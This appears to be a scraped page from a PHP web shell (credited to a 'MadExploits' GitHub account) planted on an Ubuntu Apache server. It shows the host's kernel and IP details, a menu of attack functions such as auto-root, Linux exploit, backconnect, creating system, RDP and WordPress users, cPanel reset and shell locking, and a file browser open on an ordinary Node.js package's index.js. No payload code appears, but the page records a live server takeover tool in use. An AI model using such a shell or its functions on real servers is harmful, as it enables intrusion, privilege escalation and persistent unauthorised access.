Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pg-types /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.travis.yml
83
B
-rw-rw-r--
Makefile
232
B
-rw-rw-r--
README.md
3.74
KB
-rw-rw-r--
index.d.ts
2.57
KB
-rw-rw-r--
index.js
1.19
KB
-rw-rw-r--
index.test-d.ts
759
B
-rw-rw-r--
package.json
973
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
var textParsers = require('./lib/textParsers'); var binaryParsers = require('./lib/binaryParsers'); var arrayParser = require('./lib/arrayParser'); var builtinTypes = require('./lib/builtins'); exports.getTypeParser = getTypeParser; exports.setTypeParser = setTypeParser; exports.arrayParser = arrayParser; exports.builtins = builtinTypes; var typeParsers = { text: {}, binary: {} }; //the empty parse function function noParse (val) { return String(val); }; //returns a function used to convert a specific type (specified by //oid) into a result javascript type //note: the oid can be obtained via the following sql query: //SELECT oid FROM pg_type WHERE typname = 'TYPE_NAME_HERE'; function getTypeParser (oid, format) { format = format || 'text'; if (!typeParsers[format]) { return noParse; } return typeParsers[format][oid] || noParse; }; function setTypeParser (oid, format, parseFn) { if(typeof format == 'function') { parseFn = format; format = 'text'; } typeParsers[format][oid] = parseFn; }; textParsers.init(function(oid, converter) { typeParsers.text[oid] = converter; }); binaryParsers.init(function(oid, converter) { typeParsers.binary[oid] = converter; });
Close